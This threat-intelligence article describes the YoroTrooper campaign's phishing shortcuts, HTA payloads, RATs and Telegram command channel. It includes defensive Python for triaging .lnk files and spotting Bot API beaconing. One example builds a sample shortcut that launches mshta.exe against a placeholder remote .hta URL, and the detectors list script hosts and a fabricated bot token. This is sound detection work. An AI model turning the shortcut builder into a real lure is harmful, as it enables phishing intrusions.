YoroTrooper group, the newest menace against CIS entities

March 30, 2023
YoroTrooper Hacking Group Cyberattack Cyberthreat Cybercrime Middle East

The Commonwealth of Independent States (CIS) is facing a new threat campaign, tracked as YoroTrooper, that has been targeting its member states. According to reports, the operation has been conducting espionage against healthcare agencies and embassies since June 2022.

A cybersecurity researcher explained that YoroTrooper commonly targets government agencies and energy providers in CIS member states such as Tajikistan, Kyrgyzstan, and Azerbaijan.

Moreover, the campaign uses themed lures aimed at an energy company in Uzbekistan and government agencies in Tajikistan. It also successfully compromised and stole credentials from a European healthcare organisation and the World Intellectual Property Organization (WIPO).

The scope of this threat extends to embassies in European countries. The embassies of Turkmenistan and Azerbaijan were confirmed compromised, resulting in the exfiltration of documents and the deployment of additional malware payloads.

The YoroTrooper group starts its campaign through phishing emails.

The YoroTrooper campaign begins with phishing emails carrying malicious .lnk (Windows shortcut) files. The emails also include legitimate PDF documents related to national development to lend them authenticity and deceive more targets.

Once the target opens the attached shortcut, the chain uses an executable archive to retrieve HTA files from a remote server, which in turn drop the primary payload. The shortcut, not the accompanying PDF, is therefore the file to examine when triaging one of these emails.
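The shortcut-based chain above can be triaged without executing anything, because a .lnk file records its target, arguments, working directory, icon and window state in its header and StringData section. The following is an added example written for this article, not code from the original report or from the group's tooling: a small parser for that part of the Shell Link format, plus a triage function that flags the traits a lure shortcut tends to have (a script host such as mshta.exe as the target, a remote URL or .hta in the arguments, a minimised window, and an icon borrowed from a document viewer). The sample shortcut is built in the block from a hypothetical URL and icon path so that the example runs offline.

```python
import struct

# LinkFlags bits from the Shell Link (MS-SHLLINK) header; only the ones used here.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_FMT = "<I16sIIQQQIiIHHII"          # 76-byte ShellLinkHeader
SW_SHOWMINNOACTIVE = 7                     # ShowCommand value that opens the window minimised
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe",
                "powershell.exe", "cmd.exe", "rundll32.exe")


def _string_data(text):
    """One StringData entry: uint16 character count followed by UTF-16LE characters."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path, working_dir, arguments, icon_location, show_command=1):
    """Constructed sample builder (not attacker code): a minimal .lnk with no IDList or LinkInfo."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack(HEADER_FMT, 0x4C, LNK_CLSID, flags, 0x20,  # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,                                   # creation/access/write times
                         0, 0, show_command, 0, 0, 0, 0)            # size, icon index, show, hotkey, reserved
    return (header + _string_data(relative_path) + _string_data(working_dir)
            + _string_data(arguments) + _string_data(icon_location))


def parse_lnk(data):
    """Parse the header and StringData of a .lnk file into a dict of its launch details."""
    if len(data) < 0x4C:
        raise ValueError("too short for a Shell Link header")
    (hdr_size, clsid, flags, _attrs, _ct, _at, _wt, _size, icon_idx, show_cmd,
     _hotkey, _r1, _r2, _r3) = struct.unpack(HEADER_FMT, data[:0x4C])
    if hdr_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList (size field excludes itself)
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # skip LinkInfo (size field includes itself)
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    info = {"show_command": show_cmd, "icon_index": icon_idx}
    for bit, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")):
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:                                    # ANSI strings; code page assumed to be cp1252
            info[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return info


def triage(info):
    """Return the reasons a parsed shortcut looks like a lure; an empty list means nothing stood out."""
    findings = []
    target = (info.get("relative_path") or "").lower()
    target_name = target.rsplit("\\", 1)[-1]
    args = (info.get("arguments") or "").lower()
    icon = (info.get("icon_location") or "").lower()
    if target_name in SCRIPT_HOSTS:
        findings.append("target is a script/command host: " + target_name)
    if "http://" in args or "https://" in args:
        findings.append("arguments contain a remote URL")
    if ".hta" in args:
        findings.append("arguments reference an HTA file")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window opens minimised (SW_SHOWMINNOACTIVE)")
    if target_name in SCRIPT_HOSTS and icon and not icon.endswith(target_name):
        findings.append("icon borrowed from another file: " + icon)
    return findings


# Constructed lure: hypothetical URL and icon path, modelled on the chain described above.
SAMPLE_LNK = build_lnk(
    relative_path="..\\..\\..\\Windows\\System32\\mshta.exe",
    working_dir="C:\\Windows\\System32",
    arguments="http://lure.example.invalid/dev-plan.hta",
    icon_location="C:\\Program Files\\Adobe\\Acrobat.exe",
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    details = parse_lnk(SAMPLE_LNK)
    for line in triage(details):
        print("-", line)
```

Against a real attachment, read the file with `open(path, "rb").read()` and pass the bytes to `parse_lnk`. The parser deliberately skips the LinkTargetIDList and LinkInfo structures rather than interpreting them; the target a lure actually launches is usually visible from the relative path and arguments alone, which is what the triage function checks.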

Subsequently, YoroTrooper exfiltrates troves of data during its espionage drive, including data from multiple applications, browsing history, screenshots, cookies, and system information. The group relies on several tools for this, including custom malware, stealers, and RATs.

It also uses open-source projects, custom scripts, and commercially available tools to steal credentials.

For remote access, YoroTrooper deploys AveMaria (also known as Warzone RAT), LodaRAT, and a Python-based implant that uses Telegram for command and control. Researchers also observed the operators using reverse shell binaries and a C-based keylogger.
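A Telegram-based command channel hides in traffic to a legitimate, widely allowed service, so blocking the domain is rarely an option. What does stand out on a workstation is Bot API usage: a Telegram client or browser never calls `api.telegram.org/bot<token>/...`, whereas a bot-driven implant long-polls `getUpdates` on a fixed interval and pushes stolen files with `sendDocument`. The block below is an added example written for this article, not the researchers' detection logic: it runs over a constructed proxy log (the host names, User-Agent strings and bot token are all made up) and reports, per host and bot, why the traffic looks like a C2 channel. Only the numeric bot id is kept from the token; the secret half is never written to a finding.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log, not from the report: timestamp, source host, User-Agent, method, URL.
# The bot token is made up but has the real shape: numeric bot id, a colon, then the secret.
PROXY_LOG = """\
2023-03-01T09:00:00Z WS-17 python-requests/2.28.1 GET https://api.telegram.org/bot6123456789:AAExK1qV2sU9oOGY3WnpbjfKDxe2mztNcQ1/getUpdates?offset=41
2023-03-01T09:00:30Z WS-17 python-requests/2.28.1 GET https://api.telegram.org/bot6123456789:AAExK1qV2sU9oOGY3WnpbjfKDxe2mztNcQ1/getUpdates?offset=41
2023-03-01T09:01:01Z WS-17 python-requests/2.28.1 GET https://api.telegram.org/bot6123456789:AAExK1qV2sU9oOGY3WnpbjfKDxe2mztNcQ1/getUpdates?offset=42
2023-03-01T09:01:31Z WS-17 python-requests/2.28.1 GET https://api.telegram.org/bot6123456789:AAExK1qV2sU9oOGY3WnpbjfKDxe2mztNcQ1/getUpdates?offset=42
2023-03-01T09:02:00Z WS-17 python-requests/2.28.1 GET https://api.telegram.org/bot6123456789:AAExK1qV2sU9oOGY3WnpbjfKDxe2mztNcQ1/getUpdates?offset=43
2023-03-01T09:02:05Z WS-17 python-requests/2.28.1 POST https://api.telegram.org/bot6123456789:AAExK1qV2sU9oOGY3WnpbjfKDxe2mztNcQ1/sendDocument
2023-03-01T09:02:10Z WS-03 Chrome/111.0 GET https://web.telegram.org/a/
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")
# Bot API URLs embed the token in the path; capture the bot id and the API method, never the secret.
BOT_API_RE = re.compile(r"https?://api\.telegram\.org/bot(\d+):[A-Za-z0-9_-]{30,}/(\w+)")
BROWSER_UA_HINTS = ("mozilla", "chrome", "safari", "firefox", "edg/")
UPLOAD_METHODS = ("sendDocument", "sendPhoto", "sendVideo", "sendAudio")


def parse_events(log_text):
    """Return one event per Bot API request; anything else in the log is ignored."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, host, ua, method, url = m.groups()
        api = BOT_API_RE.search(url)
        if not api:
            continue
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "host": host, "ua": ua, "method": method,
            "bot_id": api.group(1), "api_method": api.group(2),
        })
    return events


def analyse(events, min_polls=4, max_cv=0.25):
    """Group Bot API traffic per (host, bot) and explain why each group looks like a C2 channel."""
    groups = defaultdict(list)
    for e in events:
        groups[(e["host"], e["bot_id"])].append(e)
    findings = []
    for (host, bot_id), evs in groups.items():
        evs.sort(key=lambda e: e["time"])
        reasons = []
        non_browser = [e for e in evs if not any(h in e["ua"].lower() for h in BROWSER_UA_HINTS)]
        if non_browser:
            reasons.append("non-browser client: " + non_browser[0]["ua"])
        # Beaconing: getUpdates long-polling at a steady interval (low coefficient of variation).
        polls = [e["time"] for e in evs if e["api_method"] == "getUpdates"]
        gaps = [(b - a).total_seconds() for a, b in zip(polls, polls[1:])]
        if len(polls) >= min_polls and gaps:
            avg = mean(gaps)
            if avg > 0 and pstdev(gaps) / avg <= max_cv:
                reasons.append(f"regular getUpdates polling every ~{avg:.0f}s")
        uploads = [e for e in evs if e["api_method"] in UPLOAD_METHODS]
        if uploads:
            reasons.append(f"{len(uploads)} file upload(s) via {uploads[0]['api_method']}")
        if reasons:
            findings.append({"host": host, "bot_id": bot_id, "calls": len(evs), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse(parse_events(PROXY_LOG)):
        print(f"{f['host']} -> bot {f['bot_id']} ({f['calls']} calls): " + "; ".join(f["reasons"]))
```

Bot API traffic is not proof of compromise on its own; developers and automation do talk to it. The combination the example scores, a non-browser client beaconing on a steady interval and then uploading a file, is what separates an implant from a chat bot, and the bot id it reports is enough to pivot on without handling the token itself.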

The operators behind this campaign have considerable skill and resources at their disposal. Organisations should keep their applications and AV solutions up to date, deploy anti-phishing controls at the endpoint, and treat shortcut (.lnk) attachments in email as suspicious by default, since that is where this chain starts.
